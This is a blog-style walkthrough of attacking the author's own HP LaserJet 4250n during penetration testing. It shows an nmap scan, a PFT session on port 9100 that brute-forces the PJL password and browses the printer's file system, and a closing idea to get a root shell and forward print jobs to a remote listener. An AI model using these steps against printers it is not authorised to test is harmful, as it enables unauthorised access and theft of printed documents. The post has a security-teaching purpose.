Hacking HP Printers for Fun & Profit

Does your printer have anything on it of value after you printed that document?

Printer hacking and exploiting is a valuable skill to have on a penetration test. The reason is that most all printers are connected to the network or available via the network. The other interesting thing to note is that every printer has a way to store information, usually a hard drive. Also, you can think of a printer as a small computer with a dedicated purpose, printing; but you can still make it perform some interesting things, if you have the right tools!

The Victim

The Set Up

In this demo I will use the pft tool from PHENOELIT.

It can be downloaded here.

I am running Ubuntu 12.0.4 LTS, so I unpack it and build it on my machine locally.

~/development/pentest/pjllib$ make
~/development/pentest/pjllib$ cd pft
~/development/pentest/pjllib/pft$ make

I compiled the code out of the box and noticed, since this is a Windows port, that a couple of headers were missing from the source code. I had to add the string header, string.h, in the UNIX include section.

#include 
using namespace std;
#include                       // cant live without printf() ;)

#ifndef UNIX
// Windows header files
#include                      // _getcwd() ...
#include                          // _open()
#include                       //  -"-
#include                   //  -"-
#include                    //  -"-
#include                       // if key pressed _kbhit()
#else
// UNIX header files
#include 
#include 
#include 
#include                   // open(), close(), write()
#include 
#include 
#include 
#endif //UNIX

After that fix, it compiled with warnings, but it built the executable.

The Attack

Now I ran it from the command line.

PFT - PJL file transfer
    FX of Phenoelit 
    Version 0.7 ($Revision: 1.8 $)

pft> 

A quick glance at the help command gives you the capabilities

pft> help
     help 
     quit
     server [hostname]
     port [port number]
     connect
     close
     env {read|print|show|set|options|changed|commit|unprotect|bruteforce}
     message "Display Msg"
     failure "Failure Msg"
     volumes
     chvol [vol:]
     pwd
     ls
     cd [directory]
     mkdir [directory]
     rm [file]
     get [file]
     put [local file]
     append [local file] [file]
     lpwd
     lcd [directory]
     session
     timeout [timeout]
     pause

Now let get down to business, I decided to target my HP LaserJet 4250n. Running a quick NMAP SYN scan against the target, I can see what ports are open, specifically looking for the JetDirect port. As expected NMAP tells me that port 9100 is up and running!!

~/development/pentest/pjllib/pft$ sudo nmap -sS 192.168.15.200

Starting Nmap 5.21 ( http://nmap.org ) at 2013-07-03 07:30 EDT
Nmap scan report for 192.168.15.xxx
Host is up (0.0018s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
23/tcp    open  telnet
80/tcp    open  http
280/tcp   open  http-mgmt
443/tcp   open  https
515/tcp   open  printer
631/tcp   open  ipp
7627/tcp  open  unknown
9100/tcp  open  jetdirect
14000/tcp open  unknown
MAC Address: 00:1A:4B:16:91:2F (Hewlett Packard)

Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds

Now to fire up pft and throw the goodies at it

pft> server 192.168.15.200
Server set to 192.168.15.200
pft> port 9100
Port set to 9100
pft> connect
Connected to 192.168.15.200:9100
Device: hp LaserJet 4250
pft> 

Ok, so the skiddie in me made me do this first.

pft> help message
Sets a display (ready) message on the device. Have fun.
pft> message "Altamira Rocks!!"
Display message set to 'Altamira Rocks!!'

and the result???

Now let's get down to business, let's brute force the environment to disable PJL protection.

pft> env bruteforce
try 30
INFO: force_recv_clear() timed out for 270bytes (10 sec) 
Password disabled successfully
pft> 

Well, that was easy...

So what, if any hard disks are available?

pft> volumes
  Volume       Size       Free        Location      Label     Status
      0:   12619776   11786240             RAM          ? READ-WRITE
pft> 

So what is in the O drive?

pft> ls
0:\
.                             -          d
..                            -          d
PostScript                    -          d
PJL                           -          d
saveDevice                    -          d
webServer                     -          d
pft> 

After some playing around with the file system, its time to start working on some cool stuff. Basically I want to root the printer, but how would that be accomplished? Based on this presentation from PHENOELIT at BlackHat, I got some ideas.

Navigating to the printer's java package uploader, yep; it runs java, I got a "Need to set password" link, so I clicked it. I was taken to an admin page of the printer and I was able to just set the password. I was prompted to enter a user and password when I was done, but I suspect that when I used PFT to brute force the environment, it smashed that as well. Anyway......

DOH!!! Time to upload some type of JAR file that will get me a root shell!!! Then I can spool all print jobs out to my remote listener in the cloud. Can you say P0wn3d???

In Conclusion

Printers are valuable in the organization, they are also valuable targets for hackers. Secure them as you would any other valuable piece of infrastructure.

Thanks for reading!!